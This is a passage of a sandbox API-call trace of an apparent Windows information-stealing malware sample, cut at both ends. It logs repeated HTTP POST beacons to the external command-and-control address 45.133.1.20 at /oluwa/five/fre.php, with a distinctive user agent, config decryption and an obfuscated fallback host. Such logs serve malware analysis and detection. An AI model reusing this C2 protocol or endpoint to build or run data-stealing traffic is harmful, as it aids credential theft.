%s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.576] GetProcessHeap () returned 0x6a0000 [0248.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5278 [0248.576] GetProcessHeap () returned 0x6a0000 [0248.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0248.577] GetProcessHeap () returned 0x6a0000 [0248.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0248.577] GetProcessHeap () returned 0x6a0000 [0248.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0248.577] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0248.578] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.578] GetProcessHeap () returned 0x6a0000 [0248.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0248.578] GetProcessHeap () returned 0x6a0000 [0248.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0248.579] send (s=0x81c, buf=0x6bd460*, len=242, flags=0) returned 242 [0248.579] send (s=0x81c, buf=0x6bb998*, len=159, flags=0) returned 159 [0248.579] GetProcessHeap () returned 0x6a0000 [0248.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0248.580] recv (in: s=0x81c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0248.677] GetProcessHeap () returned 0x6a0000 [0248.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0248.677] GetProcessHeap () returned 0x6a0000 [0248.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0248.678] GetProcessHeap () returned 0x6a0000 [0248.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5278 | out: hHeap=0x6a0000) returned 1 [0248.678] GetProcessHeap () returned 0x6a0000 [0248.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0248.679] closesocket (s=0x81c) returned 0 [0248.680] GetProcessHeap () returned 0x6a0000 [0248.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0248.680] GetProcessHeap () returned 0x6a0000 [0248.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0248.681] GetProcessHeap () returned 0x6a0000 [0248.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0248.684] GetProcessHeap () returned 0x6a0000 [0248.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0248.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x154c) returned 0x81c [0248.687] Sleep (dwMilliseconds=0xea60) [0248.688] GetProcessHeap () returned 0x6a0000 [0248.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0248.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0248.791] GetProcessHeap () returned 0x6a0000 [0248.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dbe18 [0248.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.793] CryptImportKey (in: hProv=0x6bf168, pbData=0x6dbe18, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0248.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.794] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.796] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.796] GetProcessHeap () returned 0x6a0000 [0248.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbe18 | out: hHeap=0x6a0000) returned 1 [0248.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.799] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0248.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.800] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0248.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.801] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0248.801] GetProcessHeap () returned 0x6a0000 [0248.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0248.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.803] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.804] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.805] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.806] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.806] GetProcessHeap () returned 0x6a0000 [0248.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0248.807] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.807] GetProcessHeap () returned 0x6a0000 [0248.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0248.809] GetProcessHeap () returned 0x6a0000 [0248.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0248.810] GetProcessHeap () returned 0x6a0000 [0248.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0248.810] GetProcessHeap () returned 0x6a0000 [0248.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0248.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.812] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.819] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0248.870] GetProcessHeap () returned 0x6a0000 [0248.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0248.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.871] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0248.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.872] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.914] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.914] GetProcessHeap () returned 0x6a0000 [0248.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0248.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.916] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0248.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.919] CryptDestroyKey (hKey=0x6ad020) returned 1 [0248.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0248.921] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0248.921] GetProcessHeap () returned 0x6a0000 [0248.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0248.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.922] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0248.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.923] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0248.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.925] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0248.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.926] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0248.926] GetProcessHeap () returned 0x6a0000 [0248.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0248.926] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0248.926] GetProcessHeap () returned 0x6a0000 [0248.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0248.926] socket (af=2, type=1, protocol=6) returned 0x820 [0248.927] connect (s=0x820, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0248.955] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0248.955] GetProcessHeap () returned 0x6a0000 [0248.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0248.956] GetProcessHeap () returned 0x6a0000 [0248.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0248.957] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0248.958] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.958] GetProcessHeap () returned 0x6a0000 [0248.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c54b8 [0248.958] GetProcessHeap () returned 0x6a0000 [0248.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0248.958] GetProcessHeap () returned 0x6a0000 [0248.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0248.959] GetProcessHeap () returned 0x6a0000 [0248.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0248.960] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0248.961] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.961] GetProcessHeap () returned 0x6a0000 [0248.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0248.961] GetProcessHeap () returned 0x6a0000 [0248.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0248.963] send (s=0x820, buf=0x6bd460*, len=242, flags=0) returned 242 [0248.964] send (s=0x820, buf=0x6bb998*, len=159, flags=0) returned 159 [0248.964] GetProcessHeap () returned 0x6a0000 [0248.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0248.964] recv (in: s=0x820, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0249.109] GetProcessHeap () returned 0x6a0000 [0249.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0249.110] GetProcessHeap () returned 0x6a0000 [0249.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0249.110] GetProcessHeap () returned 0x6a0000 [0249.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c54b8 | out: hHeap=0x6a0000) returned 1 [0249.111] GetProcessHeap () returned 0x6a0000 [0249.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0249.111] closesocket (s=0x820) returned 0 [0249.113] GetProcessHeap () returned 0x6a0000 [0249.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0249.113] GetProcessHeap () returned 0x6a0000 [0249.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.114] GetProcessHeap () returned 0x6a0000 [0249.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0249.114] GetProcessHeap () returned 0x6a0000 [0249.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0249.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1550) returned 0x820 [0249.122] Sleep (dwMilliseconds=0xea60) [0249.124] GetProcessHeap () returned 0x6a0000 [0249.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0249.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.137] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0249.208] GetProcessHeap () returned 0x6a0000 [0249.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0249.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.220] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0249.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.221] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.222] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.223] GetProcessHeap () returned 0x6a0000 [0249.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0249.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.224] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0249.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.225] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0249.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.226] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0249.227] GetProcessHeap () returned 0x6a0000 [0249.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.231] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.232] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.233] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.235] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.235] GetProcessHeap () returned 0x6a0000 [0249.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0249.235] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0249.235] GetProcessHeap () returned 0x6a0000 [0249.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0249.236] GetProcessHeap () returned 0x6a0000 [0249.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.236] GetProcessHeap () returned 0x6a0000 [0249.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0249.236] GetProcessHeap () returned 0x6a0000 [0249.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0249.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.238] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.245] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0249.255] GetProcessHeap () returned 0x6a0000 [0249.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0249.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.256] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0249.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.257] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.259] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.259] GetProcessHeap () returned 0x6a0000 [0249.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0249.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.263] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0249.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.265] CryptDestroyKey (hKey=0x6ad020) returned 1 [0249.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.266] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0249.266] GetProcessHeap () returned 0x6a0000 [0249.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.267] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0249.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.268] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0249.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0249.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.271] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0249.271] GetProcessHeap () returned 0x6a0000 [0249.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0249.271] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0249.271] GetProcessHeap () returned 0x6a0000 [0249.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0249.271] socket (af=2, type=1, protocol=6) returned 0x824 [0249.272] connect (s=0x824, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0249.295] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0249.295] GetProcessHeap () returned 0x6a0000 [0249.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0249.295] GetProcessHeap () returned 0x6a0000 [0249.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0249.296] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.309] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0249.309] GetProcessHeap () returned 0x6a0000 [0249.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4738 [0249.309] GetProcessHeap () returned 0x6a0000 [0249.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.311] GetProcessHeap () returned 0x6a0000 [0249.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0249.311] GetProcessHeap () returned 0x6a0000 [0249.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 